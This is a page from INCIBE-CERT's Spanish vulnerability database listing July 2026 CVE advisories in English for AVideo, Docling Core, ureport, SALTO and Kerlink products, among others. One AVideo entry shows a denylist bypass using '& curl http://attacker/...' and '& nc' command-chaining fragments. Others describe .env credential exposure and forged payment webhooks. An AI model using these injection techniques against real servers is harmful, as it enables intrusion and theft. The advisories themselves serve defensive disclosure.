Instituto Nacional de ciberseguridad. Sección Incibe
Instituto Nacional de Ciberseguridad. Sección INCIBE-CERT

Vulnerabilidades

Con el objetivo de informar, advertir y ayudar a los profesionales sobre las últimas vulnerabilidades de seguridad en sistemas tecnológicos, ponemos a disposición de los usuarios interesados en esta información una base de datos con información en castellano sobre cada una de las últimas vulnerabilidades documentadas y conocidas.

Este repositorio con más de 75.000 registros esta basado en la información de NVD (National Vulnerability Database) – en función de un acuerdo de colaboración – por el cual desde INCIBE realizamos la traducción al castellano de la información incluida. En ocasiones este listado mostrará vulnerabilidades que aún no han sido traducidas debido a que se recogen en el transcurso del tiempo en el que el equipo de INCIBE realiza el proceso de traducción.

Se emplea el estándar de nomenclatura de vulnerabilidades CVE (Common Vulnerabilities and Exposures), con el fin de facilitar el intercambio de información entre diferentes bases de datos y herramientas. Cada una de las vulnerabilidades recogidas enlaza a diversas fuentes de información así como a parches disponibles o soluciones aportadas por los fabricantes y desarrolladores. Es posible realizar búsquedas avanzadas teniendo la opción de seleccionar diferentes criterios como el tipo de vulnerabilidad, fabricante, tipo de impacto entre otros, con el fin de acortar los resultados.

Mediante suscripción RSS o Boletines podemos estar informados diariamente de las últimas vulnerabilidades incorporadas al repositorio.

CVE-2026-60073

Fecha de publicación:
16/07/2026
Idioma:
Inglés
*** Pendiente de traducción *** An out-of-bounds read in the Productivity Suite allows a physical <br /> attacker to control the length of data sent to a USB device. This can <br /> lead to a system crash or disclosure of kernel memory.
Gravedad CVSS v4.0: MEDIA
Última modificación:
17/07/2026

CVE-2026-61378

Fecha de publicación:
16/07/2026
Idioma:
Inglés
*** Pendiente de traducción *** A divide-by-zero vulnerability in the Productivity Suite allows a local <br /> attacker to cause a division by zero leading to a system crash.
Gravedad CVSS v4.0: MEDIA
Última modificación:
17/07/2026

CVE-2026-55173

Fecha de publicación:
16/07/2026
Idioma:
Inglés
*** Pendiente de traducción *** WWBN AVideo is an open source video platform. Versions 29.0 and below remain vulnerable to OS command injection because the fix for CVE-2026-33482 was incomplete and still does not neutralize a single &amp; ( the shell background operator). CVE-2026-33482 reported that sanitizeFFmpegCommand() (plugin/API/standAlone/functions.php) failed to strip $(...) command substitution, allowing OS command injection at the execAsync() sh -c sink. The fix (commit 25c8ab90) added $, (, ), {, }, \n, \r to the denylist character class and a str_replace(&amp;#39;&amp;&amp;&amp;#39;, &amp;#39;&amp;#39;, ...), but did not account for the single &amp;. ffmpeg.json.php builds the command from _decryptString(getInput(&amp;#39;codeToExecEncrypted&amp;#39;)). This is the same threat model the original advisory accepted (“an attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server”) and the same CVSS basis (AV:N/AC:H/PR:N). Multiple &amp;-separated commands can be chained (e.g. download + execute). Redirect-based payloads are blocked by the &gt; strip, but command execution (e.g. &amp; curl http://attacker/..., &amp; nc ..., dropping/running a file) is not. This issue has been patched by this commit: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f.
Gravedad CVSS v3.1: ALTA
Última modificación:
17/07/2026

CVE-2026-44023

Fecha de publicación:
16/07/2026
Idioma:
Inglés
*** Pendiente de traducción *** Docling Core defines core data types and transformations for the document processing application Docling. In versions 1.5.0 and above, prior to 2.74.1, docling-core did not sufficiently restrict remote request destinations and could resolve a server-provided Content-Disposition to a local path in an unsafe manner. In applications that accept untrusted URLs, this could allow SSRF attacks targeting local files outside the user-defined cache directory. This issue has been fixed in version 2.74.1.
Gravedad CVSS v3.1: ALTA
Última modificación:
30/07/2026

CVE-2026-33692

Fecha de publicación:
16/07/2026
Idioma:
Inglés
*** Pendiente de traducción *** WWBN AVideo is an open source video platform. Versions prior to 29.0 expose .env files to unauthenticated users through the official Docker compose configuration. The official docker-compose.yml mounts the entire project root directory as the Apache document root, causing the .env file — which contains database credentials, admin passwords, and infrastructure configuration — to be served as a static file at /.env. No .htaccess rule or Apache configuration blocks access to dotfiles. Exploitation enables direct database access, admin panel takeover, and further lateral movement within the Docker network. This issue has been resolved in version 29.0.
Gravedad CVSS v3.1: ALTA
Última modificación:
17/07/2026

CVE-2026-33731

Fecha de publicación:
16/07/2026
Idioma:
Inglés
*** Pendiente de traducción *** WWBN AVideo is an open source video platform. In versions prior to 29.0, the Authorize.Net webhook handler at plugin/AuthorizeNet/webhook.php contains a signature verification bypass that allows an attacker to forge webhook requests with arbitrary payment amounts and target user IDs. By supplying a valid transaction ID from a small legitimate purchase, the attacker bypasses signature validation and credits arbitrary wallet balances to any user account via attacker-controlled payload fields. Three flaws combine into an exploit chain: signature bypass via OR logic (webhook.php:33), payload values override API-fetched values (AuthorizeNet.php:169-171, webhook.php:44-48) and a missing approval check (webhook.php:61-75). By forging payment metadata, an attacker can credit arbitrary amounts to any user&amp;#39;s wallet without a corresponding payment and include a  plans_id  to activate premium subscriptions (webhook.php:86-134), enabling free access to all paid and premium content and causing direct revenue loss to the platform owner. This issue has been fixed in version 29.0.
Gravedad CVSS v3.1: MEDIA
Última modificación:
17/07/2026

CVE-2026-44019

Fecha de publicación:
16/07/2026
Idioma:
Inglés
*** Pendiente de traducción *** Docling Core defines core data types and transformations for the document processing application Docling. In versions 2.5.0 and above, prior to 2.74.1, docling-core could allow local file:// image references and accepted inline data: content without a decoded-size limit. In applications that accept untrusted image references, this may allow access to local files readable by the process or excessive memory use from large inline payloads. This issue has been fixed in version 2.74.1.
Gravedad CVSS v3.1: ALTA
Última modificación:
17/07/2026

CVE-2026-36425

Fecha de publicación:
16/07/2026
Idioma:
Inglés
*** Pendiente de traducción *** An issue in OPSWAT AppRemover Driver (ardrv.sys) v2017.10.02.1551 and earlier in IOCTL handler 0x2420031. Any local user can open the device and send process termination requests without privilege validation.
Gravedad CVSS v3.1: MEDIA
Última modificación:
17/07/2026

CVE-2026-38158

Fecha de publicación:
16/07/2026
Idioma:
Inglés
*** Pendiente de traducción *** A SQL injection vulnerability in the /ureport/datasource/previewData component of ureport v2.2.9 allows attackers to access sensitive database information via crafted SQL statements.
Gravedad CVSS v3.1: CRÍTICA
Última modificación:
17/07/2026

CVE-2026-11889

Fecha de publicación:
16/07/2026
Idioma:
Inglés
*** Pendiente de traducción *** SALTO ProAccess Space software using the tenancy feature / logical <br /> partition is vulnerable to a privilege escalation attack that could <br /> allow an authorized attacker to access any space managed by the affected<br /> product.
Gravedad CVSS v4.0: ALTA
Última modificación:
17/07/2026

CVE-2024-32386

Fecha de publicación:
16/07/2026
Idioma:
Inglés
*** Pendiente de traducción *** Directory traversal vulnerability in Kerlink Kerlink Wirnet iStation 868 KerOS v.4.3.3_20200803132042 allows a remote attacker to obtain sensitive information via the SNMP update mechanism.
Gravedad CVSS v3.1: ALTA
Última modificación:
17/07/2026

CVE-2024-32387

Fecha de publicación:
16/07/2026
Idioma:
Inglés
*** Pendiente de traducción *** An issue in Kerlink Kerlink Wirnet iStation 868 KerOS v.4.3.3_20200803132042 allows a remote attacker to obtain sensitive information via the community string component.
Gravedad CVSS v3.1: MEDIA
Última modificación:
17/07/2026